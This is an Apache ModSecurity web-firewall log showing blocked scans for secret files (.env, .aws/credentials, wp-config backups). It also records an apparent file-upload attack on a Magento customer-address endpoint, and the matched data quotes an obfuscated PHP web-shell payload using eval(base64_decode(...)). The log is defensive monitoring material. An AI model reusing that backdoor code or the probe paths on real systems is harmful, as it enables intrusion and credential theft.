[Mon Jan 26 21:26:36.446866 2026] [:error] [pid 1675793] [client 45.148.10.143:41196] [client 45.148.10.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "aXfN_KrypnbEh-LOXYdXAwAAAAU"]
[Mon Jan 26 21:26:36.447007 2026] [:error] [pid 1675793] [client 45.148.10.143:41196] [client 45.148.10.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "aXfN_KrypnbEh-LOXYdXAwAAAAU"]
[Mon Jan 26 21:26:36.478281 2026] [:error] [pid 1675793] [client 45.148.10.143:41196] [client 45.148.10.143] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /web/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/web/.env"] [unique_id "aXfN_KrypnbEh-LOXYdXBAAAAAU"]
[Mon Jan 26 21:26:36.478475 2026] [:error] [pid 1675793] [client 45.148.10.143:41196] [client 45.148.10.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/web/.env"] [unique_id "aXfN_KrypnbEh-LOXYdXBAAAAAU"]
[Mon Jan 26 21:26:36.478635 2026] [:error] [pid 1675793] [client 45.148.10.143:41196] [client 45.148.10.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/web/.env"] [unique_id "aXfN_KrypnbEh-LOXYdXBAAAAAU"]
[Mon Jan 26 21:26:36.502335 2026] [:error] [pid 1675793] [client 45.148.10.143:41196] [client 45.148.10.143] ModSecurity: Warning. Matched phrase ".aws/credentials" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/credentials found within REQUEST_FILENAME: /.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aXfN_KrypnbEh-LOXYdXBQAAAAU"]
[Mon Jan 26 21:26:36.502541 2026] [:error] [pid 1675793] [client 45.148.10.143:41196] [client 45.148.10.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aXfN_KrypnbEh-LOXYdXBQAAAAU"]
[Mon Jan 26 21:26:36.502680 2026] [:error] [pid 1675793] [client 45.148.10.143:41196] [client 45.148.10.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aXfN_KrypnbEh-LOXYdXBQAAAAU"]
[Mon Jan 26 21:26:36.532282 2026] [:error] [pid 1675793] [client 45.148.10.143:41196] [client 45.148.10.143] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-config.php.bak"] [unique_id "aXfN_KrypnbEh-LOXYdXBgAAAAU"]
[Mon Jan 26 21:26:36.532377 2026] [:error] [pid 1675793] [client 45.148.10.143:41196] [client 45.148.10.143] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-config.php.bak"] [unique_id "aXfN_KrypnbEh-LOXYdXBgAAAAU"]
[Mon Jan 26 21:26:36.532529 2026] [:error] [pid 1675793] [client 45.148.10.143:41196] [client 45.148.10.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-config.php.bak"] [unique_id "aXfN_KrypnbEh-LOXYdXBgAAAAU"]
[Mon Jan 26 21:26:36.532670 2026] [:error] [pid 1675793] [client 45.148.10.143:41196] [client 45.148.10.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-config.php.bak"] [unique_id "aXfN_KrypnbEh-LOXYdXBgAAAAU"]
[Mon Jan 26 21:27:11.359859 2026] [:error] [pid 1675794] [client 45.148.10.143:54134] [client 45.148.10.143] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "autumnus.test.indacotrentino.com"] [uri "/storage/logs/laravel.log"] [unique_id "aXfOHzsp5zRKVOBo1RPAUgAAAA0"]
[Mon Jan 26 21:27:11.360146 2026] [:error] [pid 1675794] [client 45.148.10.143:54134] [client 45.148.10.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/storage/logs/laravel.log"] [unique_id "aXfOHzsp5zRKVOBo1RPAUgAAAA0"]
[Mon Jan 26 21:27:11.360311 2026] [:error] [pid 1675794] [client 45.148.10.143:54134] [client 45.148.10.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/storage/logs/laravel.log"] [unique_id "aXfOHzsp5zRKVOBo1RPAUgAAAA0"]
[Mon Jan 26 21:29:26.659370 2026] [authz_core:error] [pid 1662854] [client 45.148.10.143:57840] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/config
[Mon Jan 26 21:29:26.729061 2026] [:error] [pid 1662854] [client 45.148.10.143:57840] [client 45.148.10.143] ModSecurity: Warning. Matched phrase "/config/parameters.yml" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /config/parameters.yml found within REQUEST_FILENAME: /config/parameters.yml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/config/parameters.yml"] [unique_id "aXfOpp9GheAZoWlmVDT0QQAAAAc"]
[Mon Jan 26 21:29:26.729312 2026] [:error] [pid 1662854] [client 45.148.10.143:57840] [client 45.148.10.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/config/parameters.yml"] [unique_id "aXfOpp9GheAZoWlmVDT0QQAAAAc"]
[Mon Jan 26 21:29:26.729515 2026] [:error] [pid 1662854] [client 45.148.10.143:57840] [client 45.148.10.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/config/parameters.yml"] [unique_id "aXfOpp9GheAZoWlmVDT0QQAAAAc"]
[Mon Jan 26 21:29:27.670148 2026] [:error] [pid 1662854] [client 45.148.10.143:57840] [client 45.148.10.143] ModSecurity: Warning. Matched phrase "/config/config.yml" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /config/config.yml found within REQUEST_FILENAME: /api/config/config.yml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/api/config/config.yml"] [unique_id "aXfOp59GheAZoWlmVDT0RwAAAAc"]
[Mon Jan 26 21:29:27.670415 2026] [:error] [pid 1662854] [client 45.148.10.143:57840] [client 45.148.10.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/api/config/config.yml"] [unique_id "aXfOp59GheAZoWlmVDT0RwAAAAc"]
[Mon Jan 26 21:29:27.670606 2026] [:error] [pid 1662854] [client 45.148.10.143:57840] [client 45.148.10.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/api/config/config.yml"] [unique_id "aXfOp59GheAZoWlmVDT0RwAAAAc"]
[Mon Jan 26 21:29:27.801337 2026] [:error] [pid 1662854] [client 45.148.10.143:57840] [client 45.148.10.143] ModSecurity: Warning. Matched phrase ".travis.yml" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .travis.yml found within REQUEST_FILENAME: /.travis.yml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.travis.yml"] [unique_id "aXfOp59GheAZoWlmVDT0SgAAAAc"]
[Mon Jan 26 21:29:27.801544 2026] [:error] [pid 1662854] [client 45.148.10.143:57840] [client 45.148.10.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.travis.yml"] [unique_id "aXfOp59GheAZoWlmVDT0SgAAAAc"]
[Mon Jan 26 21:29:27.801711 2026] [:error] [pid 1662854] [client 45.148.10.143:57840] [client 45.148.10.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.travis.yml"] [unique_id "aXfOp59GheAZoWlmVDT0SgAAAAc"]
[Mon Jan 26 21:29:28.522131 2026] [:error] [pid 1677409] [client 45.148.10.143:57842] [client 45.148.10.143] ModSecurity: Warning. Matched phrase ".aws/config" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/config found within REQUEST_FILENAME: /.aws/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.aws/config"] [unique_id "aXfOqJ940sjFbKiNzmHy1wAAAAA"]
[Mon Jan 26 21:29:28.522386 2026] [:error] [pid 1677409] [client 45.148.10.143:57842] [client 45.148.10.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.aws/config"] [unique_id "aXfOqJ940sjFbKiNzmHy1wAAAAA"]
[Mon Jan 26 21:29:28.522562 2026] [:error] [pid 1677409] [client 45.148.10.143:57842] [client 45.148.10.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.aws/config"] [unique_id "aXfOqJ940sjFbKiNzmHy1wAAAAA"]
[Tue Jan 27 01:28:13.326134 2026] [:error] [pid 1679419] [client 213.109.225.211:34591] [client 213.109.225.211] ModSecurity: Rule 7f824207bbe8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/2/7/2788364f428d25.phar"] [unique_id "aXgGnRQXPIE7pMyWDPBkogAAAAk"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Tue Jan 27 01:28:13.326679 2026] [:error] [pid 1679419] [client 213.109.225.211:34591] [client 213.109.225.211] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/2/7/2788364f428d25.phar"] [unique_id "aXgGnRQXPIE7pMyWDPBkogAAAAk"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Tue Jan 27 01:28:13.329064 2026] [:error] [pid 1679419] [client 213.109.225.211:34591] [client 213.109.225.211] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/2/7/2788364f428d25.phar"] [unique_id "aXgGnRQXPIE7pMyWDPBkogAAAAk"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Tue Jan 27 01:28:13.329319 2026] [:error] [pid 1679419] [client 213.109.225.211:34591] [client 213.109.225.211] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/2/7/2788364f428d25.phar"] [unique_id "aXgGnRQXPIE7pMyWDPBkogAAAAk"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Tue Jan 27 01:28:13.600282 2026] [:error] [pid 1679419] [client 213.109.225.211:34591] [client 213.109.225.211] ModSecurity: Warning. Pattern match ".*\\\\.(?:php\\\\d*|phtml)\\\\.*$" at FILES:custom_attributes[country_id]. [file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "109"] [id "933110"] [msg "PHP Injection Attack: PHP Script File Upload Found"] [data "Matched Data: 2788364f428d25.php8 found within FILES:custom_attributes[country_id]: 2788364f428d25.php8"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aXgGnRQXPIE7pMyWDPBkowAAAAk"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/2/7/2788364f428d25.phar
[Tue Jan 27 01:28:13.600991 2026] [:error] [pid 1679419] [client 213.109.225.211:34591] [client 213.109.225.211] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aXgGnRQXPIE7pMyWDPBkowAAAAk"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/2/7/2788364f428d25.phar
[Tue Jan 27 01:28:13.601203 2026] [:error] [pid 1679419] [client 213.109.225.211:34591] [client 213.109.225.211] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aXgGnRQXPIE7pMyWDPBkowAAAAk"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/2/7/2788364f428d25.phar
[Tue Jan 27 01:28:13.821343 2026] [:error] [pid 1679419] [client 213.109.225.211:34591] [client 213.109.225.211] ModSecurity: Rule 7f824207bbe8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/2/7/2788364f428d25.php8"] [unique_id "aXgGnRQXPIE7pMyWDPBkpAAAAAk"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Tue Jan 27 01:28:13.821830 2026] [:error] [pid 1679419] [client 213.109.225.211:34591] [client 213.109.225.211] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/2/7/2788364f428d25.php8"] [unique_id "aXgGnRQXPIE7pMyWDPBkpAAAAAk"], referer: 